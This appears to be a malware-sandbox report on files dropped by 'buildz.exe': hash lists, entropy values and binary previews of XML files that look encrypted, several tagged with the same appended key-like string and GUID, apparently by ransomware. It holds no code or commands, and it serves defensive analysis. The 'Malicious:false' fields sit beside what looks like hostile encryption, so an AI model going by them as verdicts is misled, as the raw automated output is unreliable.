                        Preview:<?xml^..+.6.P.u..In.e.i.uvg.'.^b.{......&E...`CM.......A..f...P......^Av.....3S....]#...hd:.......a....m....".I...T...4.4....Z5W..*.e&..rxM........+VM..M.-../.E.0....".uT6.g...1....r... F.. ..t...6..zs<..R!.`{=..M.....i$.1..p(..z..l.b..liR.s.:..DZ..vb1..U.....=h9}..Z.=u....ZiK)....xIm$.3F.Lig...{);.3K....q....4..@..../...d#.{.V.9C.'.V....... ..[.:.\.r.._..k...}....,9z.y...;..\...............ul......KCS....u.%.......(.=.?n1.+(W.8..B.2j.....f....H.Dm.%.Lq...mp.k..........-...i2r.mPH.>......w8....rx.....[......}......9.]|..G.R.$Vi..h...L..7..l~\$....[.+[e...........m...p'....Aj..r.`../.9.....#v.#.\bk..Y..J....!...L.x.p...C....Dp..,3..G..B..dP.%'....e7....{S.YS..43=....i......._......e...0.G.B.t.M........D..8.3y;s.*+..........Y.~L.7M.$.....c.<`8....g..){.u....s....q{...+...k=s2VQMS...1 y..*.gOX.w.M.Q4.*a.fNH..a'[..5.E.~.4.4.{.:..k..[.Uf..".Kn._.LTU.,....-..K0...0.$.w..R.s.Q."P..0.,_....6.$.....b\}.L.,..Vw(q..8.....d...\4'$. .....h..*......J.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1726
                        Entropy (8bit):7.889143099273827
                        Encrypted:false
                        SSDEEP:48:EU2/GvuW4fZxwKC40wldmVkCMhJn0YHUD:z2evX0xwKC4vrmVv0FJA
                        MD5:F539D65C2D241A0CE00ACA57A8A36A08
                        SHA1:CE498BB158AD498EA70C1CC92231EE2CCD2D106C
                        SHA-256:871ABD0F22CDCE56BE22C3EBB73F3520B7301FC7235A95969B068698636C4118
                        SHA-512:BE81BDFC9609026375CBD15832042DE8DED784332CD8BC3B4D9C62FB9316BF4DFE45F97D5A74A89DC673B29569D6490C98ADE224C8572123F23275E5657BA9FF
                        Malicious:false
                        Preview:<?xml.+i....C.{......2A.....'.jc ....@.".. 7e.\&...=.wf.L....#^0[(.......`&..........C....6~...Yz..l.l.4n.....P.h.Z.P|.P..9.P...h.._u....$.....4....S..#i.,....<k,z..T..%A...F....a...!..C>../{.h|......Nx#.<...S.C.>..0.3..+....\.{.y^(...;#..}...z.. ..AmQ..ad.._p..[.}..." .d6....q.m$..X.c.bp.i2a$/...n...O.n..o.9./.O.!.V...q".....+.\..GXw.....ML..(.^...jr.7......j..f....p..%..\...{.FFk.R..bb.Y..9R=].J...... '.........XS...c..wc.. .....a'|K.|....mSKW-.:..Y..`..l.6...Q....~F.2..6.I.|NKgi...=.RQ.t...0...-5.W.Z+^...s.?...Ul.K;f.C....5..D....../D'H..3~.}](..K.,..5&k.?...`...8..x.#.W."O4.V....5n...>.|...\..?...&V..eM...._. ......~.....gmi...m.9...W....3..W.2.moW.Zlw.s)bua.....?.uS .*..?..^T....]L~\..V.{..)..od6g..%..CK)...^.P.&^.b...9...?.....\.d.....@..b.._d..:.1.L..B...L%.e...!.g.3.u`.)$......i.O....PH......Pl...LH..........S.U...S..l3L0R..Jf......L 1.i...5..Y=..jr.d...+.h.!......O};.}.BWG.|h~>e`....\.3.4....>..~..`..a5H<.7.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1691
                        Entropy (8bit):7.888366790912282
                        Encrypted:false
                        SSDEEP:48:OFtdFeWtJrX85texJbCyOa3UbeGeSeCZUD:OFTFxt5s5tePb3OasheCZA
                        MD5:FC3BC4B7137EC1E8885F217DC6E2861C
                        SHA1:2EADD65E1328D817E4E7F0A9DC9819963DD0C2DF
                        SHA-256:EBAEFF215F420E70D04215C513A790E64C07AD51EC7F961117C04A2A52C77FAD
                        SHA-512:E94FFAAAD9A599A505914D635C151EFCE853F33337F1DFA99B50236DB2AD5F20A22E0CF1232AE39802A4318C688B3EA8DD0CCB105CE111145B15CD9923B47D8A
                        Malicious:false
                        Preview:<?xml......0.....=.Gj.~..J).......9.Q...r.z._7G.>d|}Sj.o..A6..9..%F...s..?....:.*..L..#...6.1..k../.....KO..P.....Eg..*Fh...H{...Dg....O.w.."....e'5N.eP...d..WC.Aq.7k#%.S.{..C....( .24....AX.n/3&...Y=.Je......9z..5....z..:....G*.....g.....N...@.<.3..K....N.3.+....x......% .V..%K......2.m.3.....q..t<)..l\.....P...c........m.v..6...C..Wqo.Ik.....x(...1..>....[..S...9Q).C8...$..'!;..]R.C.|\)....pZ...p:.7..-y...1|c....r~H..+bO..x.~"..d.jx..hq.\4...!.U....pn8wrb...$...+.f.G;...E.'|zP.i.Op*...%.3.]:.=."..Q.CV..$.r......."i.>.;......S.Z<!.q...Z:.|.1v.$.e.8U..J. .9V+.........wk..|.5..{.x..#78..m{.=./....n..C......+K.g.&;s..0.F.V.T.h.U..x.q6^.x......lk...j..V.@=_......|/S..:...6..r.qR..$..;..7&QH.~..)%#_..D....>....\mQ".|"..3..3..<..............p.r%Q..{d.D+...%..)..*Q..._..D.f.C...D.q..}...X.0...f...!....d.3L..6...*...\].in.g!.Q.2('K...:....-...kG..W.FnP..4..S..".U.L....O.....8....Sj...=0... [.....%.A4.nrR...,.}.a9..eoW.;VGw..B.IJ.}....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1728
                        Entropy (8bit):7.8696132746499625
                        Encrypted:false
                        SSDEEP:48:uU9Qa0rxkHow1BXsMWTO2XuUwd4YHmyAk/rOTRfUD:+eN1B8MWTONYmZ/rOVA
                        MD5:5CF0245D83E73FB9833EB01397F539DA
                        SHA1:E3B018BA10011ED3540B8D8A5C1B1CC5EC4A69BF
                        SHA-256:D1775F6DFB14670D9371DAA12E401A5C37F9891C8E568BFDCAD4EB7D89F5FBE6
                        SHA-512:64C05A71A9B2BE227850958E410737AFB7E3D150476528F52E8AD8E83EEF82B2BE395673861FA08E7B0EA3609CCD548182C1E5623C7FEF3842B257C8A751E5C0
                        Malicious:false
                        Preview:<?xml.?2..._QI..m..g.W............X......\.9"zB.`.kN.....[.:2:'p....rp?.~.mp^..L.9.w.(]...e91A..5.......w.2~.w53..}..-.....U.....ef.......# .|o8...F:.....-.zj.j).'0h.X.$f.7...^.]..D..........nb.#C.E..^.w.8yt.\.*C.....tqo..<......6.RD.%l...k......rL.!..|.m!?-.6.yw..zn...8.@y.].p5..aIW.Q%.....\`.o.....].....p...=.tr......."-^...W...b.....>...`-.7..2..........{...`...........C.1M.....c..+.'.+....(H.......e\.Ds.A.}.y$.1...].|......AT.Hp%...qD..{.lf.....UCC....B......au.s..S..X.VD_c.m~.D.(...e..ea.D.}aXV...X`D.Z...I'....[E@.y7._(.7F..B4.o...g\|9.P....(n......b....w.O.O.(1Wz.=.9.D..X...2.s.Y.p.(.K...l.m\.@..~k.o.sGc...q..../Ah.R.lE...#..Uj.]..8.8...#.q.JDE.8..Z....5.X..T.....".\....b..Hv_....k....aIS.1...U{WN...........bD5..Ox..n.W...........0S....~......w.e.XN+..Z.l<. ."..8..:...}....k..=l^..|.).z..V.o.....j.....wJ..T.qU..2D......x[b..U.j._>.V....].....@I8v.$2.3.,...f....].E.h...sh..8J........_.s'...cP....m..8..S^...(q.|%..W..2.<....(?>
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3225
                        Entropy (8bit):7.936243971858135
                        Encrypted:false
                        SSDEEP:96:wgLQPQHtceVoP1PtA6BddIoFSeK9gFeAqe6TJA:wgUwtGPtGsdOuK9pJA
                        MD5:0DA8D294761BAD1864BA1D1A4C6A45DD
                        SHA1:B1371F03039949A6D7DA9C2293907C393266884A
                        SHA-256:CA94BF2A66A02498B233020A69E2642BA94AAE1337B5AB6186A544705C5CA6D7
                        SHA-512:5CE556F93D80C6DB795CA0663FB07010A6AB5F4152DE1EC883434F9119BAD0D5399ED8931BAE58E9D737F39199021B57C09FD5ADA5CE6F19EF27CEBFD66658D3
                        Malicious:false
                        Preview:<?xml..%d.i...X..4.g.G. ..F.K...A..j/&$..{<<.y.....OVbZ.w.{...t...j.........WW@Q7.z6..>....7J.a6...w\8.<.[..I......).|..'........B+.j..u.../x(2....>.H..ftZ.6$.j.0..I.Pe...x.. ......5AKa..I6....iK...6.....y..}.(.Nc..{.E.....B..#.:..9. 69],........WW..X...p(...s..Z.S....I.w...Ir..LF.b...(.../e..0.."....E.v.`.=. {.@..y)'..O2...v.`.../;.].7..@..Uy.C...:d%Y.5...TF:m.....b.Ed.N..^^.r...4R-'.RWd.%F...0....pw...#..a.a.d..RX..N........~..5.).z....4..$n`uz.\.d4(.3..r..fm..P.7..R#.`.......0.?}.A....}VD-qj.|.(.4=........y.6..M...f~W..k......".z,V.....FZ.......H.a`=H..-.`.$9....vq.....1.....H.6...j8.).n...]&........q.T.%..m.x...P.7.".}/ ........I".D.jQ.:L...M.G...P.R*cH.s.w.......*.%g..T\."#.E..Y.f.`....9.7B..O..-j..yv..erw....G@?..u..h.G..1/9...r....%......\[..a.\..p*<....-E.b.W....;vT..~.......n@.|...........:R.s...=.F....I.a..7l5.iA_.AJ..|WC.S..IQ.(......f.Dq....|..r..S<.&.Y..dah......9#........l.H...t...w.....z.\..\S.....$%.....A...5J2b.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):851
                        Entropy (8bit):7.740919506081922
                        Encrypted:false
                        SSDEEP:12:+dqXLzmlRnE8O4CqQ0ZmRtcl6iNVM8//jXtRY5ukdBnMPlB/GbdpaXSZEU2HjZDv:+dqXaRtCUmRt8VMK9p8nM2aOENDLEGbD
                        MD5:51F8F70BBB47019DCFE528CF26B909FE
                        SHA1:12EF529F8ACA2B4458831C836B824FD0E0AD28C5
                        SHA-256:CF91656C9494D576A8DC4A551B543099C440CE8F0EC4980F319E11B643C10F37
                        SHA-512:CC5B44C0F029958D9DA2FBAAC8A9B677D3974E996222E3F8570461EEE13303B5410FCAFC4B8E0DDBBBE8BEABE00B60054AE70DC3C90AEE2C8C090E1E1E535370
                        Malicious:false
                        Preview:<?xml..A.o..c.K.W.-....#.....8...>.u.$.&..;$..g|X...k. .U.-..C.OW1?(y...d+..w.*.$.L".9...5?...K5Y....6.4_$M..NV:I...k..w..6J..y...q..t...........).1f-v.#.e.....YF.. .D.;.4..j9....(.o.E..4T.#.....'....oI&.Y...;U..ui...B..+.'4..n...&Ri..B^.+r.-.......0...y.*..h.ey!......Ek..u.6..@..b...F...Y....p..4Q.H........-......=../h....F..QZ.w.,....&j.g.C...."t.p.".0.&..x..d....7&....].G_:NX..@....x...`.8.i.....gZ.P"/..[fi...5.7....A......m...G=..x..2...}..vB.".....7F.).d.0.@.+.....C..a....#.nd........w&....9.-+.}../...H.J...SY....-.!.......m.U.Tc...o.B.......ty ....h........[...= ..i.....n_ .(.E......9V,...R....'....1E..%..z.].Di.d.c.?...Q....E.........Ww.....lj....|.K......'..M.D...&k.....J.3...IH.Ylh..{.|[?....n.iDZ.n.7z...lQ.n...<. EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1205
                        Entropy (8bit):7.8065748453222215
                        Encrypted:false
                        SSDEEP:24:CKziOSzmJgeC4DSqoTq1Fwls2+xAgPoEa6SMQWxGbD:GOSSJH7SRTqPwWzrPLsMQWxUD
                        MD5:01641D09EFD9E016BDEB16487455974F
                        SHA1:CB6E332EE1A4768D673831F9C1E37E1402735FBE
                        SHA-256:449FB4E8CD87E21AD2A4E6480FAFDC798BE8D8317E0298983E907E59A6C80214
                        SHA-512:54F57AF639F75B434A463BCF7EB4973C81815D8C2AA1A88A0EE74ECB74BC43A07097B61D61D8D963F250B42C4B846D60EF0A39C60D25393E3B016E6D9E9CA064
                        Malicious:false
                        Preview:<?xml........0x.6e.S..=6.R..{.T-.....HL.N.f........L.....a..q/.>@.-.i.%.........n......"....z./e.\..41v`......c)....[e..?v..\.....<-3[.t.I...j..=<C=.h.o.e....3.<....k6fW.....o.(...QxE....Vtl..^)....>.......p..U>%4..,.6....'.=N*.Y.58..}.L.#].7.=..J{1..l$.Z..*.EN.}..lZN...+.....%...;.eh.ou<.....vh..@.4.I7...*A...hku0=...Mn.....i.4*.{.}]{-..H...o.,.f=|Z...@..fW=|.....~.{M.$..Jy.&...|e.....J.=8.=...S..hN=...'.. H.....!4.R ../..N..&.{|.%.p..V.2I-.}...*..O"...;.c..R.r.U6.t....yYLp^^uDs.>~O...um.....f.....&. ....[.@.F.iJD.....L.B#VRR.U..I...J....j.......pzI.....F_..x..]..'/4...\..T....;..p.e......$...dc....~./t..k.m..P...-n..lq...z.....M.....R...eRi|..EM..e-.....tQ..r.".3...o....^..;."....N...3.1..............>.`.=.vG...W..PP.5c....]..7..(.....Y.$Y.)~j..x..&.._..u....4}...A.~..!.C.f.r.......#L.z..T.S5D.dL.7K...e-...^......@.+S.5....9.#CK.^....)VT/.LR4[......O*..<P.......23G....u...u..<.2.<.zc.....8.hD..}.."JO}.......r=......5......fD......{r:.v....'.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1004
                        Entropy (8bit):7.788860868729939
                        Encrypted:false
                        SSDEEP:24:XtudyehAkghMU66jwBMahL1pdk5BEO0VRdx7gj9gHCgHGbD:XQkKghM6Lo1pqLEO0VuSH/UD
                        MD5:366C5211C69D40C055BD5983EABB5500
                        SHA1:8F31B3B167261219B00DF3CDBEBFB196B9E20ABA
                        SHA-256:1796A48EE8A5FE9E999E1D9D7E766CA33AD28AC7519591ECAB474389BEB38332
                        SHA-512:18DFE8C1726FBEB2D0B41AB831270058154E4A157D5EFF4FBC86025D3D4B2DF5BC565F8802B165D53956D6BC28B6A2E4EBBD6132A3D17AD6A1579F5EE7E77C67
                        Malicious:false
                        Preview:<?xml. .;N..).e.q.......Q...4.....:.|.QBn.%..i(.........U...XI.w........X..0.F?.BjB}...v...M...R.....`S........t.G.....i.....>.........A.v...~.I...D6....Wi.LB'%.a.t..K^p..2_.ZT..+.Dy}...;.Z-.V..#9@...\.k......M.......O<..3eG.........0.N....>.0../z.?$7.S.U(....\j.....n^..O.2..y.....A..M..9.aM.a.`..D.........g...!_..F..(*.@..B.L......Hy`nZ.'9N.]..$b.u;..|....;.FyI5.U.....z%...!Y.H...^g@...1.Fpy....5..*..c,...#(.w}$l._.i....$.b..........*.#.-..m...@.+1GLuo....R..t.n...8_......u.]0..F..%...$.!).;;5 .n9...h...p.{..@l.J....[..dV.cz..$[..Z..\a;../[.^....p.."|...?.. ...%.O...$1.<z.T.A...d,n,B...i.-_..LS%.f...h...."...8*vW...aL|..k....I.#..AK.J.q...3.*\p.q8....B.X5..x...V..'.MFI..dU...X.Y...x...G.e'......<..o.<....dN..%.#.r..].H.&.O..D....&..x)Z.?...VU..Db]..|...N.....U.....@.$.TcF".fR/.......0.HLs].x.T.#.X\.vz9....]u.z..5V$Z.fc...{.Ee..V.%..a.`..z[.L....O2a.....K.f$...7..1[...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1697
                        Entropy (8bit):7.883476220518065
                        Encrypted:false
                        SSDEEP:48:lPGA9i4yPuNY49QQllxjGg4SS9+JpsmIBmSDcM7UD:VZi4yPzQ3jQ8/qA
                        MD5:C7B030E25046BDE5C818C8735357F9F2
                        SHA1:F573416D782936359406692884C78AB04ABB3777
                        SHA-256:A4404A3CFF3CEC81E1970D88C49723974DA09B62F702F32206D6E0E5CEB8F485
                        SHA-512:6A96D4408B97FCFE0B68B97F2477634874E16B6DB8B66689EB916FCF94CA2CF1EE0D98ADB5A5069037BD8E75429E7ABB1C7E4F3E091D2866A042A2F922BA10C2
                        Malicious:false
                        Preview:<?xml.C.X.i+mz".N6..(iy.g.].<Gl......r..;.....%...?.nv.&\.K0.....pNap./......X.3K.Ai....k.....Q......$;..ix......$t...yO;...9.*.I...U..m3i..........k...+~...Bb.c...O....c..T...XhL=}.z.np.ET.....P..`H.Z&.,%.E....0.j..1|.....!l.f....SX....?^.u).n*@......w4.!&...#..5.....S.}.|.1$..e.....A.....2....%...j07..1.F....=..#.v..Mw...L....O.T.E:L.o......v.....J..J^5..5...~.Cu,J.......WBn.].>u...qO.O/;.K.y.3.4H...U.HG..5.E%.@6..."...Y...%w_..I3.`6......`.......Z.8.H..B..4Guw.qY.....[{.XQ..[........OH....`?m.w.d..X.~p..8E............|Q.)$.....xa.`..p..A.......#r..xV..%k,S..4.`..M..?."...G..j.8K.L.*u~..+...;.?[....a.....-..Kv.....?..o.xG..O.......5..]...Y.<..(.1.(q>...>..=...ZG....\.w...O....^....E..N>.W...r.T.Z5z.4iQp........wt5....L....-..?..6...b....=...u..y+]M65[U~..bd..K*..- .....`O]c.g.....L........[h^|?Jl1.s_.3^"..5..d.1i.._\...wg.vcI..S..*v.w..=.....DM.yud.......e.UD1l.Aq?.C0......l%c....YXqp.z.>..~......Zv.,.(.:;....Z....S......~..<...:%:Z.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1734
                        Entropy (8bit):7.8940010364340685
                        Encrypted:false
                        SSDEEP:48:jZzpuG+SqFQaNU+UC01g8PeewMTFCGhf/CfSmUD:tw2qFQaqjC01g8mCTFZUrA
                        MD5:C29985FE0F6609277E292480EE564405
                        SHA1:870BDED5A6682C4329F6D0AD89F5677CB05C42A3
                        SHA-256:F04714B76D6BC09E6273847133BA0D647184ADF084DD0B66FAC1E35450F4A595
                        SHA-512:A8FFE917515C581A15FBF82BC8A7C19C320993CFC90C6B9393A33F4FF7DCFF47255F32DAE1390DCE065B129EFCC4B5238CEF2DD97288AA90609BB3241FFD9EC0
                        Malicious:false
                        Preview:<?xml.....;jA...j#}....?.....]....*Q.....G3.x..F5.yb....8..N..!o..L..}.T..LL.p...#...89..c...;1..k}...0pO..0..`.R..M.1.i.#/[*:lW>.`.K}5L........~.1i.X.,.k......CFo..F.w;..c..X..\i.H3...U+V1..}V..a>zsx\.5.1.]Vg.F.I0..P.."V....To.....P2..W.7.U.&o[.\...6U3.SZ .pW@K.J..}...4N..n1q._..9...x....7.^}..W.D.......<...N.O...7...1~. 8u%_;.;..P.r.x..dH....!.(.....1...l.J.94l......O.-.?%.3!j..E.A.g]..P.".[...V..D.X...6>..z...L....b.....7.@uo..p.a...[J..+5.#..dV..rT.A..Y'....K.3M$.6....$..m.S.`.9...z".2..]`.^i..R. .Z.R....U....G2..c.....?9...H.~C.....&...~.`.Y4U.O..k...d..2#V._=..V...k....*....;]$....Dd.O...pP.V.&.3.}.C<:t..0.(....4....9.-q2.....Q.x)..lz.`..}.....F.Ui......i.E.J.M.....y...@..._.....g.EVJp.p....G...7.'.P`(.2....&.r!!P.V.;.....G...R.....O_q..>..wD.H....ZLS....[....;...O.=.~...b.,3....[..%."X....Sm..0;.Wl.<.).h.{...].|I..L..'....}...R|.tSIX.........[...K.2e.,x.7c.....f.....D...|.Q..-uv..e...asuY....&g.e-l..//z.H.@..N.6..:",..:A..1..wX.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):771
                        Entropy (8bit):7.691232110017862
                        Encrypted:false
                        SSDEEP:12:A2ZUBCjqcM6+tUDD75yBgTjV7gtEGRYMKmiWD66sLyl3NGMKj26Gcii9a:AYUzF7tmuxRDKjK6BwNGHGbD
                        MD5:08D4F3AE5BA051DBA777968F10AD00F5
                        SHA1:81181AD0236E1EC0E11EFA2E73FA1830826AF350
                        SHA-256:125835357FD12D65A0982A8BBE4C9690FC7DF4050E534AFE135C9E6855461363
                        SHA-512:FF0FB3B742FD016BF2962DD5E28A5843F73DC5E32A9664CD943CF1A8E1B632B54DCD85CE8E95A898DD6BDB2904DAE66A4FDC439DA1309C1423C4D5D15FF0EB3E
                        Malicious:false
                        Preview:<?xml...l....p%6.....=Bv.L>..$'.i...g2.2......<..3.. (+.....'CGA o......OR..=.(..+.s.e?....L.....SLG..$r.+T.5HF....33u..S.g..!.Z.L...x..G.V..X...R..I.[..&...c......2.."m...t%...&.\|...l..8..mq.,,....>4;....'...eQ...+9..h*I.W....be....X.c.Ht.!...3..j.h[2#..1..Y.:...cp&.=.#.>.Ta..}*.6..'.53.._.....C...Y.H.....o.X;.%..8.@4.n.M9..y.c..6.T...>2.....Q2.p....FD.^.@..-u.@..H..iu.{...'.....A9.-....C....N...J..[...+.R.@..T3...kBY.;b.A.R.@.... ...g.fb...H....}b.t.F.'...w.1...._h|+E?....?..tS....K!...jb..Ro...b..@.t$0~..O..x.(.WB!..N...."LYQP.w.q....Yi.r....~.5|..k..T.K...P.N\X&.......V...4K%z......*R..!._..Z.1..^N.5...3. .r_.{.P..ZmF5.K....~l..g...rX)......:..1.....mxv.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):774
                        Entropy (8bit):7.707169762577977
                        Encrypted:false
                        SSDEEP:12:lwDPMwZCarZqCBIIgcL6EY3gLznoZOsOriTF+lChi8e3d9nYIYsW5/On26Gcii9a:mDiaNxuIgcOa8ZOskMLxeNyIHGOfGbD
                        MD5:04E6DA01E9E590156C580FF1C49F5B36
                        SHA1:7BACBFB96711CCA9D6F58BC403B78017B7C636F7
                        SHA-256:985578929B03384A2235E68F259719D55ACBABA426008760BB8ABDAE6A815562
                        SHA-512:859E7F8EFDABDD2E2A26C9FFF5A6B6F34C3F0F8EAC7B617E71EA9123CA66291032F101D4AACEDEF94722E3F3F86FB678C59CC8962E14FB53AFA42563697550E1
                        Malicious:false
                        Preview:<?xml..%............-3.O...'.I.+..9."#..RF....N.t.......aqkM..Z...t.q.:....;....h...<k.Jl....S......|...v:.Go]......Qx......clD3.Ct..@..9.......i....a.~e.b.E........5.z.....b......"..k',].....^..1......t$)...snZ%......>"1..,...../XO......0.A......a..$20M.4.#.]j...,....Z..#.vM...b........}.,..ZO...m.... .R_..z%..^..!..c|....;cH.~@).C7.@X+...^tj..,.-..lx.....Y.c'%.K..,.o.1E.>..v....b....L..z.:..m.m....s...i.\..r..3..A..h.....58.-+.M..... .......Q....X...g..=..M.......F.P.P...qx.fv..A.l..y....).s..L..H...*.m.k_...C..(i..g+..#'..,....<.<.f4..[. n.[.....v$E.So6.w=G...6.m..!.|+..R..#@...B.~e.b..".:IR.[#&..^......Veo...#....ox(...D.b!.#...A.?......1.N|.p1.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1693
                        Entropy (8bit):7.870689726646602
                        Encrypted:false
                        SSDEEP:48:zLzXlLXwySEiGCXgvMV6Zl11k1aUJ4FkKXXUD:zL7lMfkUVKw83A
                        MD5:C118B4D95B48361CAE5F14CDB8E50151
                        SHA1:82D19C82DC9E9FD8BC584ED6B2EDBB88FF42A8FA
                        SHA-256:F690B4C24D21AA925BA7816FE6792D74E084ADFB387D1B3A8F4AFF3D374EA6E9
                        SHA-512:5E9650973EB9E13D45A38B7483E38670D0A6A36D1C88F7A13B1A1D1A100162E246ECA57F0CCEF55DCBB14A2D2214B4A88F0517B16CA27A76D96766D904FDD1DB
                        Malicious:false
                        Preview:<?xml.l_.Y..o.M.......".9P....<.T..oX.?.....r...B.......^...s.."..U..x..r<r..|#.@....".4....Gm..-.qi< .;J,..5.G...q...."..{.P8...tb...:....,....h..e.....L._H..v=..p.s=...g..P..rOcHM.4....D....!e.?.h..k..zXb..o.z..I..v..l...e...B..4.H.....A3.p.b<.%x.,1.0..[7X,D.....0.2..6.....kE.sz:.odp...%y.&.....'dN:B...W.m(...,..........,^.>.<|....=..j...].9.[a..U...l....&.d.2r.,..bS.#$.n.u.].Q...Y.Sw.@.....5..A;"....o+..gvH.`....=..T`).d..66......B..T&c.Oc...vV>z...2...}.7.'S..../..w.w...j....,..]E......).V.=..`....lu.V.}'b...]&.....7..]..]..dX...Z_.d....&`O...0..-..L....j.....].b....}....?8.'....G.Z.?..Q.sD....Ndd.F^.y..I]Np./U...p.)......].Id.9[.>./.......9A.M..4...i2............P......g(.`.e.q..W.m-.|......5.E...j.g.O.6X.LMi.Y1...=...L....\(...._.V.K....Zg]M...3.....q.n...&..`ku.....Aw.?....2....=.[.E.f..ss.A..^....2..pG..*ng.^.E.,*.D.,.-57.'s.J...sF..r..27R..H.....HO2|......"...7..h......}.. .}..3q?O..z.R..).X+....\l......>.v....3..>.a{
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1730
                        Entropy (8bit):7.896098139073426
                        Encrypted:false
                        SSDEEP:24:9HDvEmXTcrg8HmVZmZxWRP7xxm11dFCSkwGyM3wwXPxSEo+0cFNwPv8bdgezu0FQ:9o6QvmNM1G13CwXYF+0c3NZhu0FXUD
                        MD5:EF21669D90B8B8259D79E0FCDFCABA8F
                        SHA1:8962793D48716CE12119CCFBD3D6B4FAC01376A9
                        SHA-256:6C7A66D72DBCAFC3E626E1766C8E161CFF4EF3C94F5807669FDA4717CF3E8D01
                        SHA-512:01A7EEDC16ECA0FABD3169697745549F3B181B566CDD533D51D0DC7830EBAE813D3B1C744AAD72CCE372AF1B9E2D03D78DA41032D2A435F762FECB9448D5EC28
                        Malicious:false
                        Preview:<?xml.'.Y.......,m.......lA.n..I.|.{R.(..u.....qe....L.....L.....It."..p.F...b.......#..!....?..........!....{.... V..H.V.\...-8.'!..[o..jA>..0...)....h.>.)......WX....2.6[.r.{.%.r:q..)-z.u..._.8.{......7..B.(.x.H.c0...]l.ki......=...t......V7g...Q..r.us.v9.k.4j...f{.~...r...{l..1...M..N.b.!. $.2..A.<...a._b.U.....[...C...s....89=..&.m....?>....F.a..".%......x.m,U,..._.|..&.'/|.f~..R.9%w3.1...?..s.,....@.._.G<T.#.]2..wP6.....J..f...Q8......y......^&..5.....|vw8..)....Sa1F.P..9.F..N.....u.k....,..y[.3g?..9.X.....5`96...h..p.[w...5.#.=g@.'.......*G.......f...!..&..FQ..@l...X...RV.Jl.....$.V.rT[i.q.Ye...h...N.......6...V..$..}..u..bH.C".g..../.=:.Md..[....N@..t.6..vJ5...Dz7^[..e..:.=x...U..s.~..{....)+L.n#.IE.~...._2.d.....p..4S.W.N..LF..y(PV...{..<{..zi...{V.-X...3t.0.m...."... .=...~q...oI4..D...K.....h.D..-.j..f..k(..=.]..9....y..}~.Y.Ba.......x..k....H1"p8q...|.K%E....d..W|da..K.....fX.S..H...ll....E.e.(...i.U...a.,<..... ....W..j.)=....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):753
                        Entropy (8bit):7.663550534547728
                        Encrypted:false
                        SSDEEP:12:sJYTYIVivX6TF0c8ZOUxLmSLMBiuv+Py1fCycSXaRZz1pdw5SN+HTDh1T26Gciik:1TRE6K4WLm1BiuvNqycSXcdW5SNo1GbD
                        MD5:7BE9AB635A1E9131EAE7DEED11D70B36
                        SHA1:5A4C89EABC8F89CA491AF2DB95956F986E537112
                        SHA-256:484F25BA8D415E7CDCBC9D5799D4CDC9724517F6437301C94004B18FD460BD31
                        SHA-512:BB3C3BFD54A994065B9C11D79091CB2063D7DE6EDA02979E93C8B291B7C485324F7390E5E0AC4681D0766FA1EF6392116F33158A6A57171668EB09523A96DE86
                        Malicious:false
                        Preview:<?xml.m....@..}..q....r>a.q..;....'g.....@..=...d....^q....6&.....1..&.O.......-...J..rd.4.....v..G..r#a. .8B"......Gl....qFi.g..u9..#.C..I.F..z..}.X.e......@.)~WX..I.......=.1\.2.g@.'...g......Q5...*.Fc..gZ...j.h.g`G...y}pn....h..s....w......Z~.w..N.....Jd...?.2O.2.'~..O....^...s.($.l..\+...3c}........3n.....)L...a.p....*.@.%`...v.kr.?*...%...p.l.l...qN|...DzL.ow...{&.>.2.....r...e.)"P.cr.*.=...W..w.q.A>..@?...bV....R>.....mx..5.).X..k.q..B..&(..e...*.).b`k.6R0`Y............ ....`1nF:...Q..`5y.....W...J..P0>.......}.z.P]U.[?*.Z...?'D g\K......V..J.T....B..-.WA...z.:.2m]..*!.b..s.U.v.....5:.^v...^..0.m8.>...v'....L.~W..|.b..F.n..fEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):773
                        Entropy (8bit):7.708288284037585
                        Encrypted:false
                        SSDEEP:24:BNYXZ9bFAdfNt0n1p6BV09P4ocmgBfGbD:BNYXDF4linDeWP4nmgRUD
                        MD5:CDD3C71AC751558FB919482833A388FF
                        SHA1:0045113F073A86BA563604FA91992A3A6AF19654
                        SHA-256:6B51229E3140A6BD956F62A09F6D363DAAB717D23BC2C7A4207506D5F29146C9
                        SHA-512:BBEA5F176714AC127F60E3CDC78661C0E54BE6E6EAEFB4B008AA98A3C2CDE003EA7F4BC705EB8E1589E079CCB1F63A4CB54B6E579ED48E64D8DBE5DA4C2E7073
                        Malicious:false
